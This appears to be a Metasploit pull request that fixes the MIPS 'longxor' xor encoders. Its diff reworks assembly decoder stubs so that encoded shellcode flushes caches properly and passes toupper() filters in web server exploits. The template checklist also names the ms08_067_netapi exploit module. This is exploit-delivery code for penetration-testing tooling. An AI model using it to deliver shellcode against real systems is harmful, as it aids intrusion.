### PR TITLE
Make longxor encoder great again

### DIFF
--- a/modules/encoders/mipsbe/longxor.rb
+++ b/modules/encoders/mipsbe/longxor.rb
@@ -13,7 +13,10 @@ class MetasploitModule < Msf::Encoder::Xor
       'Description'      => %q{
         Mips Web server exploit friendly xor encoder
       },
-      'Author'           => 'Julien Tinnes <julien[at]cr0.org>',
+      'Author'           => 
+        [   'Julien Tinnes <julien[at]cr0.org>',   # original shellcode
+            'Pedro Ribeiro <pedrib@gmail.com>',    # fix Linux >= 2.6.11 and toupper() compat
+        ],
       'Arch'             => ARCH_MIPSBE,
       'License'          => MSF_LICENSE,
       'Decoder'          =>
@@ -36,7 +39,8 @@ class MetasploitModule < Msf::Encoder::Xor
     raise EncodingError.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
 
     # 16-bits not (again, see below)
-    reg_14 = (number_of_passes+1)^0xFFFF
+    reg_10 = (number_of_passes+1)^0xFFFF
+    reg_5 = state.buf.length^0xFFFF
     decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
 ;
 ; MIPS nul-free xor decoder
@@ -72,66 +76,67 @@ main:
 li macro reg, imm
 ;	lui reg, ((imm) >> 16) & 0ffffh
 ;	ori reg, reg, (imm) & 0ffffh
-  addiu reg, $0, imm		; sufficient if imm.abs <= 0x7fff
+  addiu reg, $0, imm		    ; sufficient if imm.abs <= 0x7fff
 endm
 
-  li(	$14, #{reg_14})		; 4 passes
-  nor	$14, $14, $0		; put number of passes in $14
+  li(	$10, #{reg_10})		    ; load number of passes ^ 0xffff
+  nor	$10, $10, $0		      ; put number of passes in $10 
 
-  li(	$11,-73)		; addend to calculated PC is 73
+  li(	$11,-89)		          ; addend to calculated PC is 73
 ;.set noreorder
 next:
   bltzal  $8, next
 ;.set reorder
   slti    $8, $0, 0x8282
-  nor     $11, $11, $0		; addend in $9
-  addu	$25, $31, $11		; $25 points to encoded shellcode +4
-;	addu	$16, $31, $11		; $16 too (enable if you want to pass correct parameters to cacheflush
+  nor     $11, $11, $0	    ; addend in $9
+  addu	$25, $31, $11		    ; $25 points to encoded shellcode +4
+  addu	$16, $31, $11		    ; $16 too (used to set up the cacheflush() arg down below)
 
-;	lui	$2, 0xDDDD     		; first part of the xor (old method)
-  slti	$23, $0, 0x8282 	; store 0 in $23 (our counter)
-;	ori	$17, $2, 0xDDDD 	; second part of the xor (old method)
-  lw	$17, -4($25)		; load xor key in $17
+;	lui	$2, 0xDDDD     		    ; first part of the xor (old method)
+  slti	$23, $0, 0x8282     ; store 0 in $23 (our counter)
+;	ori	$17, $2, 0xDDDD 	    ; second part of the xor (old method)
+  lw	$17, -4($25)		      ; load xor key in $17
 
 
-  li(	$13, -5)
-  nor	$13, $13, $0		; 4 in $13
+  li(	$9, -5)
+  nor	$9, $9, $0		        ; 4 in $9
 
-  addi	$15, $13, -3		; 1 in $15
+  addi	$15, $9, -3		      ; 1 in $15
 loop:
   lw	$8, -4($25)
 
-  addu	$23, $23, $15		; increment counter
+  addu	$23, $23, $15		    ; increment counter
   xor	$3, $8, $17
-  sltu	$30, $23, $14		; enough loops?
+  sltu	$30, $23, $10		    ; enough loops?
   sw	$3, -4($25)
-  addi	$6, $13, -1		; 3 in $6 (for cacheflush)
+  addi	$6, $9, -1		      ; 3 in $6 (for cacheflush)
   bne	$0, $30, loop
-  addu	$25, $25, $13		; next instruction to decode :)
+  addu	$25, $25, $9		    ; next instruction to decode :)
 
 
-;	addiu	$4, $16, -4	       	; not checked by Linux
-;	li      $5,40                  	; not checked by Linux
-;	li      $6,3                   	; $6 is set above
+  addiu	$4, $16, -4         ; cacheflush() addr parameter
+  li(      $10,#{reg_5})    ; cacheflush() nbytes parameter
+  nor   $5, $10, $0         ; same as above
+;   li      $6,3            ; $6 is set above, 3rd arg for cacheflush()
 
 ;	.set    noreorder
-  li(     $2, 4147)               ; cacheflush
-  ;.ascii "\\x01JT\\x0c"		; nul-free syscall
+  li(     $2, 4147)         ; cacheflush
+;   .ascii "\\x01JT\\x0c"   ; nul-free syscall
   syscall 0x52950
 ;	.set    reorder
 
 
-          ; write last decoder opcode and decoded shellcode
-;	li      $4,1            	; stdout
+; write last decoder opcode and decoded shellcode
+;	li      $4,1              ; stdout
 ;	addi	$5, $16, -8
-;	li      $6,40           	; how much to write
+;	li      $6,40             ; how much to write
 ;	.set    noreorder
-;	li      $2, 4004                ; write
+;	li      $2, 4004          ; write
 ;	syscall
 ;	.set    reorder
 
 
-  nop				; encoded shellcoded must be here (xor key right here ;)
+  nop				                ; encoded shellcoded must be here (xor key right here ;)
 ; $t9 (aka $25) points here
 
 EOS

--- a/modules/encoders/mipsle/longxor.rb
+++ b/modules/encoders/mipsle/longxor.rb
@@ -13,7 +13,10 @@ class MetasploitModule < Msf::Encoder::Xor
       'Description'      => %q{
         Mips Web server exploit friendly xor encoder
       },
-      'Author'           => 'Julien Tinnes <julien[at]cr0.org>',
+      'Author'           =>
+        [   'Julien Tinnes <julien[at]cr0.org>',   # original shellcode
+            'Pedro Ribeiro <pedrib@gmail.com>',    # fix Linux >= 2.6.11 and toupper() compat
+        ],
       'Arch'             => ARCH_MIPSLE,
       'License'          => MSF_LICENSE,
       'Decoder'          =>
@@ -36,7 +39,8 @@ class MetasploitModule < Msf::Encoder::Xor
     raise EncodingError.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
 
     # 16-bits not (again, see below)
-    reg_14 = (number_of_passes+1)^0xFFFF
+    reg_10 = (number_of_passes+1)^0xFFFF
+    reg_5 = state.buf.length^0xFFFF
     decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), <<EOS).encoded.data
 ;
 ; MIPS nul-free xor decoder
@@ -72,66 +76,67 @@ main:
 li macro reg, imm
 ;	lui reg, ((imm) >> 16) & 0ffffh
 ;	ori reg, reg, (imm) & 0ffffh
-  addiu reg, $0, imm		; sufficient if imm.abs <= 0x7fff
+  addiu reg, $0, imm		    ; sufficient if imm.abs <= 0x7fff
 endm
 
-  li(	$14, #{reg_14})		; 4 passes
-  nor	$14, $14, $0		; put number of passes in $14
+  li(	$10, #{reg_10})		    ; load number of passes ^ 0xffff
+  nor	$10, $10, $0		      ; put number of passes in $10
 
-  li(	$11,-73)		; addend to calculated PC is 73
+  li(	$11,-89)		          ; addend to calculated PC is 73
 ;.set noreorder
 next:
   bltzal  $8, next
 ;.set reorder
   slti    $8, $0, 0x8282
-  nor     $11, $11, $0		; addend in $9
-  addu	$25, $31, $11		; $25 points to encoded shellcode +4
-;	addu	$16, $31, $11		; $16 too (enable if you want to pass correct parameters to cacheflush
+  nor     $11, $11, $0	    ; addend in $9
+  addu	$25, $31, $11		    ; $25 points to encoded shellcode +4
+  addu	$16, $31, $11		    ; $16 too (used to set up the cacheflush() arg down below)
 
-;	lui	$2, 0xDDDD     		; first part of the xor (old method)
-  slti	$23, $0, 0x8282 	; store 0 in $23 (our counter)
-;	ori	$17, $2, 0xDDDD 	; second part of the xor (old method)
-  lw	$17, -4($25)		; load xor key in $17
+;	lui	$2, 0xDDDD     		    ; first part of the xor (old method)
+  slti	$23, $0, 0x8282     ; store 0 in $23 (our counter)
+;	ori	$17, $2, 0xDDDD 	    ; second part of the xor (old method)
+  lw	$17, -4($25)		      ; load xor key in $17
 
 
-  li(	$13, -5)
-  nor	$13, $13, $0		; 4 in $13
+  li(	$9, -5)
+  nor	$9, $9, $0		        ; 4 in $9
 
-  addi	$15, $13, -3		; 1 in $15
+  addi	$15, $9, -3		      ; 1 in $15
 loop:
   lw	$8, -4($25)
 
-  addu	$23, $23, $15		; increment counter
+  addu	$23, $23, $15		    ; increment counter
   xor	$3, $8, $17
-  sltu	$30, $23, $14		; enough loops?
+  sltu	$30, $23, $10		    ; enough loops?
   sw	$3, -4($25)
-  addi	$6, $13, -1		; 3 in $6 (for cacheflush)
+  addi	$6, $9, -1		      ; 3 in $6 (for cacheflush)
   bne	$0, $30, loop
-  addu	$25, $25, $13		; next instruction to decode :)
+  addu	$25, $25, $9		    ; next instruction to decode :)
 
 
-;	addiu	$4, $16, -4	       	; not checked by Linux
-;	li      $5,40                  	; not checked by Linux
-;	li      $6,3                   	; $6 is set above
+  addiu	$4, $16, -4         ; cacheflush() addr parameter
+  li(      $10,#{reg_5})    ; cacheflush() nbytes parameter
+  nor   $5, $10, $0         ; same as above
+;   li      $6,3            ; $6 is set above, 3rd arg for cacheflush()
 
 ;	.set    noreorder
-  li(     $2, 4147)               ; cacheflush
-  ;.ascii "\\x01JT\\x0c"		; nul-free syscall
+  li(     $2, 4147)         ; cacheflush
+;   .ascii "\\x01JT\\x0c"   ; nul-free syscall
   syscall 0x52950
 ;	.set    reorder
 
 
-          ; write last decoder opcode and decoded shellcode
-;	li      $4,1            	; stdout
+; write last decoder opcode and decoded shellcode
+;	li      $4,1              ; stdout
 ;	addi	$5, $16, -8
-;	li      $6,40           	; how much to write
+;	li      $6,40             ; how much to write
 ;	.set    noreorder
-;	li      $2, 4004                ; write
+;	li      $2, 4004          ; write
 ;	syscall
 ;	.set    reorder
 
 
-  nop				; encoded shellcoded must be here (xor key right here ;)
+  nop				                ; encoded shellcoded must be here (xor key right here ;)
 ; $t9 (aka $25) points here
 
 EOS


### PR DESCRIPTION
The longxor encoder for mipsbe does not work correctly. At the end of the decoding, it should invoke cacheflush() with the correct parameters:
int cacheflush(char *addr, int nbytes, int cache)

The encoder previously did not setup the arguments, as it even said so in the comments:
;       addiu   $4, $16, -4       ; not checked by Linux
;       li      $5,40                   ; not checked by Linux
;       li      $6,3                    ; $6 is set above

I think this is because the encoder is pretty old (2008), and before kernel 2.6.11, cacheflush() did not need any parameters (from the cacheflush man page):
BUGS
       Linux  kernels older than version 2.6.11 ignore the addr and nbytes arguments, making this function fairly expensive.  Therefore, the
       whole cache is always flushed.

This commit fixes that by setting up the parameters correctly. As an unfortunate side effect this increases the shellcode by 16 bytes, but it is absolutely necessary for it to work properly. 

Note that this bug is not present when testing the encoder output on an emulator like qemu; emulators do not need to flush the caches to work properly.

As an added bonus I have also made it compatible with toupper() restrictions, which is common in web server exploits too. This did not add any extra bytes to the encoder.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

